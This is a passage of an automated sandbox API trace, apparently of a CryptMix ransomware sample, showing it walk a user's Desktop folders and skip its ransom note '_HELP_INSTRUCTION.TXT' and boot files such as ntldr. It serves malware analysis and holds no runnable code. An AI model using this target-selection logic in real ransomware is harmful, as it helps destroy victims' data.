lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.525] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="ntldr") returned 0x0 [0035.525] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="NTLDR") returned 0x0 [0035.525] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="NTDETECT.COM") returned 0x0 [0035.525] StrStrW (lpFirst="NvEcGQE86DZ.flv", lpSrch="ntdetect.com") returned 0x0 [0035.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.525] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.525] lstrcmpW (lpString1="oNjA8Krckm-Uh1s9B5p.mkv", lpString2="..") returned 1 [0035.525] lstrcmpW (lpString1="oNjA8Krckm-Uh1s9B5p.mkv", lpString2=".") returned 1 [0035.525] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.525] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="ntldr") returned 0x0 [0035.525] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="NTLDR") returned 0x0 [0035.525] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="NTDETECT.COM") returned 0x0 [0035.525] StrStrW (lpFirst="oNjA8Krckm-Uh1s9B5p.mkv", lpSrch="ntdetect.com") returned 0x0 [0035.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.525] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.525] lstrcmpW (lpString1="oVGbbCOCJnt_S.bmp", lpString2="..") returned 1 [0035.525] lstrcmpW (lpString1="oVGbbCOCJnt_S.bmp", lpString2=".") returned 1 [0035.525] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.525] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="ntldr") returned 0x0 [0035.525] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="NTLDR") returned 0x0 [0035.525] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0035.525] StrStrW (lpFirst="oVGbbCOCJnt_S.bmp", lpSrch="ntdetect.com") returned 0x0 [0035.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.525] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.525] lstrcmpW (lpString1="P2Yd7s y0s0iE3pixbWf.mp4", lpString2="..") returned 1 [0035.525] lstrcmpW (lpString1="P2Yd7s y0s0iE3pixbWf.mp4", lpString2=".") returned 1 [0035.525] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.525] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="ntldr") returned 0x0 [0035.525] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="NTLDR") returned 0x0 [0035.525] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0035.525] StrStrW (lpFirst="P2Yd7s y0s0iE3pixbWf.mp4", lpSrch="ntdetect.com") returned 0x0 [0035.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.525] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.525] lstrcmpW (lpString1="qWhs9jNagvnL0I2S.avi", lpString2="..") returned 1 [0035.525] lstrcmpW (lpString1="qWhs9jNagvnL0I2S.avi", lpString2=".") returned 1 [0035.525] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.525] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="ntldr") returned 0x0 [0035.525] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="NTLDR") returned 0x0 [0035.525] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="NTDETECT.COM") returned 0x0 [0035.525] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="ntdetect.com") returned 0x0 [0035.525] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.525] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.525] lstrcmpW (lpString1="R29FEAYxqzGKfm4iuq.wav", lpString2="..") returned 1 [0035.526] lstrcmpW (lpString1="R29FEAYxqzGKfm4iuq.wav", lpString2=".") returned 1 [0035.526] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.526] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="ntldr") returned 0x0 [0035.526] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="NTLDR") returned 0x0 [0035.526] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="NTDETECT.COM") returned 0x0 [0035.526] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="ntdetect.com") returned 0x0 [0035.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.526] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.526] lstrcmpW (lpString1="RcaCR.avi", lpString2="..") returned 1 [0035.526] lstrcmpW (lpString1="RcaCR.avi", lpString2=".") returned 1 [0035.526] StrStrW (lpFirst="RcaCR.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.526] StrStrW (lpFirst="RcaCR.avi", lpSrch="ntldr") returned 0x0 [0035.526] StrStrW (lpFirst="RcaCR.avi", lpSrch="NTLDR") returned 0x0 [0035.526] StrStrW (lpFirst="RcaCR.avi", lpSrch="NTDETECT.COM") returned 0x0 [0035.526] StrStrW (lpFirst="RcaCR.avi", lpSrch="ntdetect.com") returned 0x0 [0035.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.526] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.526] lstrcmpW (lpString1="SdgI3.mp4", lpString2="..") returned 1 [0035.526] lstrcmpW (lpString1="SdgI3.mp4", lpString2=".") returned 1 [0035.526] StrStrW (lpFirst="SdgI3.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.526] StrStrW (lpFirst="SdgI3.mp4", lpSrch="ntldr") returned 0x0 [0035.526] StrStrW (lpFirst="SdgI3.mp4", lpSrch="NTLDR") returned 0x0 [0035.526] StrStrW (lpFirst="SdgI3.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0035.526] StrStrW (lpFirst="SdgI3.mp4", lpSrch="ntdetect.com") returned 0x0 [0035.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.526] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.526] lstrcmpW (lpString1="XaK4rq6FxAm.gif", lpString2="..") returned 1 [0035.526] lstrcmpW (lpString1="XaK4rq6FxAm.gif", lpString2=".") returned 1 [0035.526] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.526] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="ntldr") returned 0x0 [0035.526] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="NTLDR") returned 0x0 [0035.526] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="NTDETECT.COM") returned 0x0 [0035.526] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="ntdetect.com") returned 0x0 [0035.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.526] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.526] lstrcmpW (lpString1="xzzx_cryptMix.vir.exe", lpString2="..") returned 1 [0035.526] lstrcmpW (lpString1="xzzx_cryptMix.vir.exe", lpString2=".") returned 1 [0035.526] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.526] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="ntldr") returned 0x0 [0035.526] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="NTLDR") returned 0x0 [0035.526] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="NTDETECT.COM") returned 0x0 [0035.526] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="ntdetect.com") returned 0x0 [0035.526] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.526] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.526] lstrcmpW (lpString1="Ya6Z9poxN.swf", lpString2="..") returned 1 [0035.526] lstrcmpW (lpString1="Ya6Z9poxN.swf", lpString2=".") returned 1 [0035.527] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.527] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="ntldr") returned 0x0 [0035.527] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="NTLDR") returned 0x0 [0035.527] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="NTDETECT.COM") returned 0x0 [0035.527] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="ntdetect.com") returned 0x0 [0035.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.527] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.527] lstrcmpW (lpString1="ym0OWp.ods", lpString2="..") returned 1 [0035.527] lstrcmpW (lpString1="ym0OWp.ods", lpString2=".") returned 1 [0035.527] StrStrW (lpFirst="ym0OWp.ods", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.527] StrStrW (lpFirst="ym0OWp.ods", lpSrch="ntldr") returned 0x0 [0035.527] StrStrW (lpFirst="ym0OWp.ods", lpSrch="NTLDR") returned 0x0 [0035.527] StrStrW (lpFirst="ym0OWp.ods", lpSrch="NTDETECT.COM") returned 0x0 [0035.527] StrStrW (lpFirst="ym0OWp.ods", lpSrch="ntdetect.com") returned 0x0 [0035.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.527] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.527] lstrcmpW (lpString1="YmOf4LXrg2cAXUtOgh.m4a", lpString2="..") returned 1 [0035.527] lstrcmpW (lpString1="YmOf4LXrg2cAXUtOgh.m4a", lpString2=".") returned 1 [0035.527] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.527] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="ntldr") returned 0x0 [0035.527] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="NTLDR") returned 0x0 [0035.527] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0035.527] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="ntdetect.com") returned 0x0 [0035.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.527] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.527] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.527] lstrcmpW (lpString1="zexl18m.mp3", lpString2="..") returned 1 [0035.527] lstrcmpW (lpString1="zexl18m.mp3", lpString2=".") returned 1 [0035.527] StrStrW (lpFirst="zexl18m.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.527] StrStrW (lpFirst="zexl18m.mp3", lpSrch="ntldr") returned 0x0 [0035.527] StrStrW (lpFirst="zexl18m.mp3", lpSrch="NTLDR") returned 0x0 [0035.527] StrStrW (lpFirst="zexl18m.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0035.527] StrStrW (lpFirst="zexl18m.mp3", lpSrch="ntdetect.com") returned 0x0 [0035.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.527] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.527] lstrcmpW (lpString1="ZZFMbf.odt", lpString2="..") returned 1 [0035.527] lstrcmpW (lpString1="ZZFMbf.odt", lpString2=".") returned 1 [0035.527] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.527] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="ntldr") returned 0x0 [0035.527] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="NTLDR") returned 0x0 [0035.527] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="NTDETECT.COM") returned 0x0 [0035.527] StrStrW (lpFirst="ZZFMbf.odt", lpSrch="ntdetect.com") returned 0x0 [0035.527] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.527] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.527] lstrcmpW (lpString1="_av9Cb6IPXGAa5C.mp4", lpString2="..") returned 1 [0035.528] lstrcmpW (lpString1="_av9Cb6IPXGAa5C.mp4", lpString2=".") returned 1 [0035.528] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.528] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="ntldr") returned 0x0 [0035.528] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="NTLDR") returned 0x0 [0035.528] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0035.528] StrStrW (lpFirst="_av9Cb6IPXGAa5C.mp4", lpSrch="ntdetect.com") returned 0x0 [0035.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.528] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0035.528] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0035.528] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0035.528] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0035.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*" [0035.528] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpSrch="Desktop") returned="Desktop\\" [0035.528] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0035.528] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="Desktop" [0035.528] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Desktop" | out: lpString1="Desktop") returned="Desktop" [0035.528] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0035.528] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0035.528] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.528] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0035.528] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.528] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.528] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.528] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.528] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.528] lstrcmpW (lpString1="Ee7G-xHgdwJfqcsImMM", lpString2="..") returned 1 [0035.528] lstrcmpW (lpString1="Ee7G-xHgdwJfqcsImMM", lpString2=".") returned 1 [0035.528] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0035.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0035.528] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0035.528] SetErrorMode (uMode=0x1) returned 0x1 [0035.528] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0035.529] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.529] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.529] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*" [0035.529] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x324c38 [0035.529] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0035.529] lstrcpyW (in: lpString1=0x17b644, lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0035.529] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.529] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.529] lstrcmpW (lpString1="4BTbVX2SL5PMNXlhJi.m4a", lpString2="..") returned 1 [0035.529] lstrcmpW (lpString1="4BTbVX2SL5PMNXlhJi.m4a", lpString2=".") returned 1 [0035.529] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.529] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="ntldr") returned 0x0 [0035.529] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="NTLDR") returned 0x0 [0035.529] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0035.529] StrStrW (lpFirst="4BTbVX2SL5PMNXlhJi.m4a", lpSrch="ntdetect.com") returned 0x0 [0035.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.529] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.529] lstrcmpW (lpString1="BOrtQ-gODoJ96Mp2i.pps", lpString2="..") returned 1 [0035.529] lstrcmpW (lpString1="BOrtQ-gODoJ96Mp2i.pps", lpString2=".") returned 1 [0035.529] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.529] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="ntldr") returned 0x0 [0035.529] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="NTLDR") returned 0x0 [0035.529] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="NTDETECT.COM") returned 0x0 [0035.529] StrStrW (lpFirst="BOrtQ-gODoJ96Mp2i.pps", lpSrch="ntdetect.com") returned 0x0 [0035.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.529] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.529] lstrcmpW (lpString1="RH-9w1ekDlX.swf", lpString2="..") returned 1 [0035.529] lstrcmpW (lpString1="RH-9w1ekDlX.swf", lpString2=".") returned 1 [0035.529] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.529] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="ntldr") returned 0x0 [0035.529] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="NTLDR") returned 0x0 [0035.529] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="NTDETECT.COM") returned 0x0 [0035.529] StrStrW (lpFirst="RH-9w1ekDlX.swf", lpSrch="ntdetect.com") returned 0x0 [0035.529] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.529] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.529] lstrcmpW (lpString1="rvzAqm2.flv", lpString2="..") returned 1 [0035.529] lstrcmpW (lpString1="rvzAqm2.flv", lpString2=".") returned 1 [0035.529] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.529] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="ntldr") returned 0x0 [0035.529] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="NTLDR") returned 0x0 [0035.529] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="NTDETECT.COM") returned 0x0 [0035.530] StrStrW (lpFirst="rvzAqm2.flv", lpSrch="ntdetect.com") returned 0x0 [0035.530] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.530] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.530] lstrcmpW (lpString1="TrEKohawJ.m4a", lpString2="..") returned 1 [0035.530] lstrcmpW (lpString1="TrEKohawJ.m4a", lpString2=".") returned 1 [0035.530] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.530] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="ntldr") returned 0x0 [0035.530] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="NTLDR") returned 0x0 [0035.530] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0035.530] StrStrW (lpFirst="TrEKohawJ.m4a", lpSrch="ntdetect.com") returned 0x0 [0035.530] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.530] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.530] lstrcmpW (lpString1="TxQmAhXtJ1.mp3", lpString2="..") returned 1 [0035.530] lstrcmpW (lpString1="TxQmAhXtJ1.mp3", lpString2=".") returned 1 [0035.530] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.530] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="ntldr") returned 0x0 [0035.530] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="NTLDR") returned 0x0 [0035.530] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0035.530] StrStrW (lpFirst="TxQmAhXtJ1.mp3", lpSrch="ntdetect.com") returned 0x0 [0035.530] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.530] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.530] lstrcmpW (lpString1="ySq45fyDTuTLWzePdp4.m4a", lpString2="..") returned 1 [0035.530] lstrcmpW (lpString1="ySq45fyDTuTLWzePdp4.m4a", lpString2=".") returned 1 [0035.530] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.530] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="ntldr") returned 0x0 [0035.530] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="NTLDR") returned 0x0 [0035.530] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0035.530] StrStrW (lpFirst="ySq45fyDTuTLWzePdp4.m4a", 